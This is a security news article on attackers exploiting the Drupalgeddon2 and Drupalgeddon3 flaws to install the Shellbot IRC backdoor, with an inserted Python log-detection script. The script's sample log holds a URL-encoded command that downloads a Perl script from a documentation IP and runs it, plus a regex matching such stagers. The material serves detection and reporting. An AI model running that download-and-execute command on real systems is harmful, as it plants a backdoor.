
Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor

A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year to install a backdoor on compromised servers.

Security experts from IBM observed attackers targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the compromised systems and take full control of the hosted platforms.

According to the IBM experts, this latest wave of attacks is conducted by financially motivated hackers who exploit the lack of patch management on many Drupal websites.

“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.

“This appears to be a financially motivated effort to mass-compromise websites.”

The experts observed a large number of HTTP POST requests sent from the same IP address as part of a widespread attack. The attackers used the requests to download a Perl script that launches the Shellbot backdoor, which uses an Internet Relay Chat (IRC) channel as its command-and-control (C&C) server.

The bot includes multiple tools to carry out distributed denial-of-service (DDoS) attacks and to scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.

The bot was designed to automate the scanning of a large number of websites and to fully compromise the vulnerable ones.
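The two observable traits the IBM analysts describe (a burst of POST requests from one source IP, and a request whose payload fetches a Perl script that starts the bot) can be turned into a simple detector over web server access logs. The script below is an added example, not code from the IBM report or from Security Affairs. It assumes Apache "combined" log format, that the Drupal form path under attack is `/user/register` (an assumption; the article names no endpoint), and that the download command is visible in the logged request URI. In a real attack the payload usually travels in the POST body, which the access log does not record, so the same stager rule would have to run over a WAF or mod_security audit log instead. The log lines are constructed and use RFC 5737 documentation addresses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" format. The IPs are RFC 5737
# documentation addresses and the payload is illustrative, not captured traffic.
SAMPLE_LOG = """\
198.51.100.20 - - [10/Nov/2018:12:00:01 +0000] "GET /node/1 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2018:12:00:05 +0000] "POST /user/register HTTP/1.1" 200 512 "-" "python-requests/2.19"
203.0.113.7 - - [10/Nov/2018:12:00:06 +0000] "POST /user/register HTTP/1.1" 200 512 "-" "python-requests/2.19"
203.0.113.7 - - [10/Nov/2018:12:00:07 +0000] "POST /user/register HTTP/1.1" 200 512 "-" "python-requests/2.19"
203.0.113.7 - - [10/Nov/2018:12:00:08 +0000] "POST /user/register?q=wget%20http%3A%2F%2F203.0.113.9%2Fsh.pl%20-O%20%2Ftmp%2Fsh.pl%3Bperl%20%2Ftmp%2Fsh.pl HTTP/1.1" 200 512 "-" "python-requests/2.19"
198.51.100.21 - - [10/Nov/2018:12:00:09 +0000] "POST /user/login HTTP/1.1" 303 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "method uri proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shape of the second stage the article describes: a shell command that fetches
# a Perl script (wget/curl ... .pl) or runs one with perl.
PERL_STAGER_RE = re.compile(r'\b(?:wget|curl)\b[^;|&]*\.pl\b|\bperl\s+\S+\.pl\b', re.I)

# Drupal form endpoint assumed to be the exploitation target (assumption, not
# from the article); adjust to the paths your own Drupal install exposes.
DEFAULT_PATHS = ("/user/register",)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Exploit payloads arrive URL-encoded; decode before pattern matching.
    rec["decoded_uri"] = unquote_plus(rec["uri"])
    return rec


def find_suspects(log_text, post_threshold=3, window=timedelta(seconds=60), paths=DEFAULT_PATHS):
    """Return {ip: [reasons]} for source IPs that show either a burst of POSTs to a
    Drupal form endpoint within `window`, or a request carrying a Perl stager."""
    posts = defaultdict(list)      # ip -> timestamps of POSTs to the watched paths
    reasons = defaultdict(list)    # ip -> human-readable findings

    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if PERL_STAGER_RE.search(rec["decoded_uri"]):
            reasons[rec["ip"]].append(f"perl stager in request: {rec['decoded_uri']}")
        if rec["method"] == "POST" and rec["decoded_uri"].split("?")[0] in paths:
            posts[rec["ip"]].append(rec["ts"])

    # Sliding window: flag an IP if any `post_threshold` POSTs fall within `window`.
    for ip, stamps in posts.items():
        stamps.sort()
        for i in range(len(stamps) - post_threshold + 1):
            if stamps[i + post_threshold - 1] - stamps[i] <= window:
                reasons[ip].append(
                    f"{post_threshold}+ POSTs to {', '.join(paths)} within {int(window.total_seconds())}s"
                )
                break
    return dict(reasons)


if __name__ == "__main__":
    for ip, findings in find_suspects(SAMPLE_LOG).items():
        print(ip)
        for f in findings:
            print("  -", f)
```

The burst rule on its own is noisy on a busy site (legitimate registration spikes, monitoring probes), so in practice it is the stager rule, or the combination of both, that is worth paging on. Pairing it with an outbound-connection rule for the IRC C&C traffic the article mentions (a web server process opening a connection to a remote IRC port) gives a second, independent signal that the host was actually compromised rather than merely scanned.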

Experts pointed out that the Shellbot code first appeared in 2005 and is used by several threat groups. It was also used in the massive crypto-mining campaign that exploited the Apache Struts vulnerability CVE-2017-5638 in March 2017.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Pierluigi Paganini

(Security Affairs – Drupal, hacking)

